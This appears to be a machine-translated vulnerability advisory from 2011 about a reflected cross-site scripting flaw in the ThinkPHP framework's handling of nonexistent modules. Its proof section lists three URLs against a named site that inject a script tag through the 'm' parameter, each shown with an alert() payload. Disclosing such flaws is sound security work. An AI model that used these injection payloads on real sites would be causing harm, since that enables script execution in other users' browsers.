ThinkPHP development framework xss-vulnerability warning-the black bar safety net

2011-12-26T00:00:00
ID MYHACK58:62201132721
Type myhack58
Reporter 佚名
Modified 2011-12-26T00:00:00

Description

Brief description: open source php development framework for default therexssvulnerabilities, leading to all use of the framework for the development of the system are presentxssvulnerability

Detailed description: does not does not exist in the module handle the error properly, leading toxssvulnerability

Vulnerability to prove:

To Super Rangers test

http://i.sucop.com/?m='"><script>alert(3);</script><"&a=login

http://i.sucop.com/index.php?m='"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&

http://i.sucop.com/index.php?m='"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&

Go and see

Solution: set a is better than filter it~~~

Author Hxai11